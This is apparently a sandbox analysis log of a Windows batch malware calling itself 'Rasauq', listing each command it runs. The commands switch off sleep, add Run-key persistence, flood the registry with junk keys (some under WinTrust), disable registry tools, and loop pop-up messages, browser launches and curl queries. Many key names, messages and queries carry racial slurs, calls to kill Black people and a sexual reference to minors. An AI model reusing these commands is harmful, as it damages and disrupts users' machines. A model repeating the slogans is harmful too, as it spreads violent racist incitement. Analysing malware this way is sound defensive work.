  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      PID:3740
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      PID:5992
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:292
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:592
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:2352
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:6064
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:320
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:1792
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:4608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:4108
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:3560
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3488
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4032
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3688
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:3420
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5924
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3384
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
      4⤵
      PID:1636
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3612
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4408
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:3632
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:3652
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:460
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
      4⤵
      PID:3916
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4200
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5264
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:536
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:2444
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      PID:5192
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3496
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3184
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f
      4⤵
      PID:3428
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:4708
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:5816
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:3176
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f
      4⤵
      PID:4116
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:5296
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5272
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:4084
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:5764
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4616
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5184
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1788
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3164
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5900
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      PID:4776
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1912
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2560
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:4668
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:2076
  - - C:\Windows\system32\reg.exe
      reg add "End of search: 39 match(es) found.\Software\Rasauq on top" /f
      4⤵
      PID:1996
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:1140
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4496
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      PID:1932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1948
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6100
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3568
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4340
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5184
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5900
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2848
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5980
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4228
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5804
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5472
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3740
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5616
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5992
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1808
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6004
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5412
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1044
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3368
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:668
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3488
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:304
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2432
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4876
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3704
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2112
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3964
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5980
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2060
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:300
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3588
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2144
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3228
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3612
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:396
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2556
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2976
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:396
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2144
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3820
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4816
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4856
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:396
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5916
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:396
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4856
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6492
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6556
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6148
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6240
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6260
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:948
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6728
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6880
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6916
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6592
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:948
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6684
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6560
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2880
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6676
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6604
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6156
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6656
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6960
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6368
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6736
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7312
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7392
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7412
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7884
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8000
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8048
